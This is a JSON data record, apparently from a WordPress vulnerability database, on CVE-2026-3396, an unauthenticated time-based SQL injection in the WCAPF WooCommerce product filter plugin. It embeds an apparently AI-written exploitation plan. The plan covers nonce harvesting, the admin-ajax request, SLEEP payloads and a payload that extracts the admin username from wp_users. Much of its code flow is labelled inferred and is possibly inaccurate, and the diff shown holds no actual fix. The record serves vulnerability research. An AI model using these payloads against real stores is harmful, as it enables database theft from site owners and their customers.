[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-UB-2BF8mj6hMuBNM4R5AdqC9OYSQoQYe7W415VPRQM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-3396","wcapf-woocommerce-ajax-product-filter-unauthenticated-time-based-sql-injection","WCAPF – WooCommerce Ajax Product Filter \u003C= 4.2.3 - Unauthenticated Time-Based SQL Injection","WCAPF – WooCommerce Ajax Product Filter plugin is vulnerable to time-based SQL Injection via the 'post-author' parameter in all versions up to, and including, 4.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","wc-ajax-product-filter",null,"\u003C=4.2.3","4.3.0","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-07 00:00:00","2026-04-08 11:16:58",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fee0a762e-9159-4dab-a7be-9cbe332effb1?source=api-prod",1,[22,23,24,25,26,27,28],"build\u002Fform-rtl.css","build\u002Fform.asset.php","build\u002Fform.css","build\u002Fform.js","build\u002Flist-forms-rtl.css","build\u002Flist-forms.asset.php","build\u002Flist-forms.css","researched",false,3,"# Exploitation Research Plan: CVE-2026-3396 (WCAPF SQL Injection)\n\n## 1. Vulnerability Summary\nThe **WCAPF – WooCommerce Ajax Product Filter** plugin (versions \u003C= 4.2.3) contains an unauthenticated time-based SQL injection vulnerability. The flaw exists in the handling of the `post-author` parameter within AJAX filtering requests. User input is concatenated directly into a SQL query without proper sanitization (e.g., `absint()`) or the use of `$wpdb->prepare()`. Because this occurs in an AJAX handler registered for unauthenticated users, any attacker can execute arbitrary SQL queries to extract sensitive data from the database.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `wcapf_ajax_filter` (inferred from plugin functionality)\n*   **Vulnerable Parameter:** `post-author`\n*   **Authentication:** None required (Unauthenticated)\n*   **Payload Type:** Time-based blind SQL Injection\n*   **Preconditions:** The plugin must be active. A valid AJAX nonce is likely required, though often accessible on the shop page.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with `action=wcapf_ajax_filter`.\n2.  **Hook Registration:** The plugin registers the action via:\n    `add_action( 'wp_ajax_nopriv_wcapf_ajax_filter', [ $this, 'ajax_filter' ] );`\n3.  **Input Acquisition:** The handler function (e.g., `ajax_filter()`) retrieves the `post-author` value from `$_POST` or `$_GET`.\n4.  **Vulnerable Processing:** The plugin constructs a query to filter products by author. It likely interpolates the `post-author` value directly into the `WHERE` clause:\n    ```php\n    $author = $_POST['post-author'];\n    $results = $wpdb->get_results(\"SELECT ... WHERE post_author IN ($author) ...\");\n    ```\n5.  **Sink:** The raw SQL string is executed by `$wpdb->get_results()`, triggering the injection.\n\n## 4. Nonce Acquisition Strategy\nThe plugin typically localizes its configuration and security nonces for frontend use.\n\n1.  **Identify Shortcode:** The plugin uses `[wcapf_form]` or `[wcapf_products]` to display filters.\n2.  **Create Test Page:**\n    `wp post create --post_type=page --post_title=\"Shop Filter\" --post_status=publish --post_content=\"[wcapf_form]\"`\n3.  **Navigate to Page:** Use `browser_navigate` to visit the newly created page.\n4.  **Extract Nonce:** The plugin localizes data into a JavaScript object. Based on common patterns in WCAPF, the object is likely `wcapf_params`.\n    *   **JS Command:** `browser_eval(\"window.wcapf_params?.nonce\")`\n    *   **Alternative:** If not found, check for any localized object containing \"nonce\" using `browser_eval(\"Object.keys(window).filter(k => k.includes('wcapf'))\")`.\n\n## 5. Exploitation Strategy\nThe goal is to confirm the vulnerability using a time-based payload.\n\n### Step-by-Step Execution:\n\n1.  **Discovery:** Locate the exact AJAX action and localized variable name by searching the plugin directory:\n    *   `grep -r \"wp_ajax_nopriv\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fwc-ajax-product-filter\u002F`\n    *   `grep -r \"wp_localize_script\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fwc-ajax-product-filter\u002F`\n\n2.  **Baseline Request:** Send a legitimate request to measure the standard response time.\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=wcapf_ajax_filter&wcapf_nonce=[NONCE]&post-author=1\n    ```\n\n3.  **Sleep Payload:** Send the injection payload.\n    *   **Parameter:** `post-author`\n    *   **Value:** `1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a`\n    *   **Encoded Value:** `1)%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a`\n\n4.  **Data Extraction (PoC):** Extract the database version.\n    *   **Payload:** `1) AND (SELECT 1 FROM (SELECT(IF(SUBSTRING(VERSION(),1,1)='8',SLEEP(5),0)))a`\n\n## 6. Test Data Setup\n1.  **Install Dependencies:** Ensure WooCommerce is installed and active.\n2.  **Create Product:**\n    `wp eval \"if(!get_page_by_path('test-product', OBJECT, 'product')){ wc_create_product(['name' => 'Test Product']); }\"`\n3.  **Create Filter Page:**\n    `wp post create --post_type=page --post_title=\"Filter Test\" --post_status=publish --post_content='[wcapf_form]' --post_name='filter-test'`\n4.  **Identify Nonce:** Visit `\u002Ffilter-test` and extract `wcapf_params.nonce`.\n\n## 7. Expected Results\n*   **Baseline:** Response time \u003C 500ms.\n*   **Attack:** Response time > 5000ms.\n*   **Response Body:** Likely a JSON object with a `success` key or a HTML snippet of filtered products.\n\n## 8. Verification Steps\nAfter confirming the delay, verify the database state to ensure no permanent damage occurred (though SQLi here is READ-only by description):\n1.  Check for the existence of the `wp_users` table content using the SQLi to confirm extraction capability:\n    *   **Payload:** `1) AND (SELECT 1 FROM (SELECT(IF(ASCII(SUBSTRING((SELECT user_login FROM wp_users WHERE ID=1),1,1))=97,SLEEP(5),0)))a` (Checks if admin username starts with 'a').\n\n## 9. Alternative Approaches\n*   **Boolean-Based Blind:** If `post-author=1` returns products and `post-author=1 AND 1=2` returns \"No products found\", switch to boolean-based extraction as it is significantly faster than time-based.\n*   **Error-Based:** Check if `post-author=1'` triggers a visible database error in the AJAX response. If `WP_DEBUG` is on, use `updatexml()` or `extractvalue()` for immediate data extraction.\n*   **Action Name Variations:** If `wcapf_ajax_filter` fails, check for `wcapf_filter` or `wcapf_apply_filter` by searching for `add_action.*wp_ajax` in the plugin's `includes\u002F` directory.","The WCAPF – WooCommerce Ajax Product Filter plugin for WordPress is vulnerable to unauthenticated time-based SQL Injection via the 'post-author' parameter in version 4.2.3 and earlier. This occurs because user input is concatenated directly into a SQL query without proper sanitization or the use of WordPress's database preparation methods, allowing attackers to extract sensitive data via time-based inference.","\u002F\u002F Inferred logic in the AJAX handler (e.g., ajax_filter() in the plugin's AJAX controller)\n$author = $_POST['post-author'];\n$results = $wpdb->get_results(\"SELECT ... WHERE post_author IN ($author) ...\");","Only in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-ajax-product-filter\u002F4.2.3\u002Fadmin: lib\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-ajax-product-filter\u002F4.2.3\u002Fbuild\u002Fform.asset.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-ajax-product-filter\u002F4.3.0\u002Fbuild\u002Fform.asset.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-ajax-product-filter\u002F4.2.3\u002Fbuild\u002Fform.asset.php\t2025-01-19 19:46:38.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-ajax-product-filter\u002F4.3.0\u002Fbuild\u002Fform.asset.php\t2026-03-16 16:38:52.000000000 +0000\n@@ -1 +1 @@\n-\u003C?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n', 'wp-notices', 'wp-primitives'), 'version' => '989ca2867ffeee42d68e');\n+\u003C?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n', 'wp-notices', 'wp-primitives'), 'version' => 'ce3dee3c876dd11dfb86');","To exploit this vulnerability, an unauthenticated attacker follows these steps:\n1. Access the shop page or any page where the WCAPF filter is active to obtain a valid nonce from the localized 'wcapf_params' JavaScript object (e.g., `window.wcapf_params.nonce`).\n2. Construct a POST request directed at `\u002Fwp-admin\u002Fadmin-ajax.php` with the `action` parameter set to `wcapf_ajax_filter`.\n3. Include the extracted nonce in the `wcapf_nonce` parameter.\n4. Inject a time-based SQL payload into the `post-author` parameter, such as `1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a`.\n5. Verify the injection by observing that the server's response time is delayed by the amount specified in the SLEEP command (e.g., 5 seconds).","gemini-3-flash-preview","2026-04-17 21:03:11","2026-04-17 21:03:44",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","4.2.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-ajax-product-filter\u002Ftags\u002F4.2.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwc-ajax-product-filter.4.2.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-ajax-product-filter\u002Ftags\u002F4.3.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwc-ajax-product-filter.4.3.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-ajax-product-filter\u002Ftags"]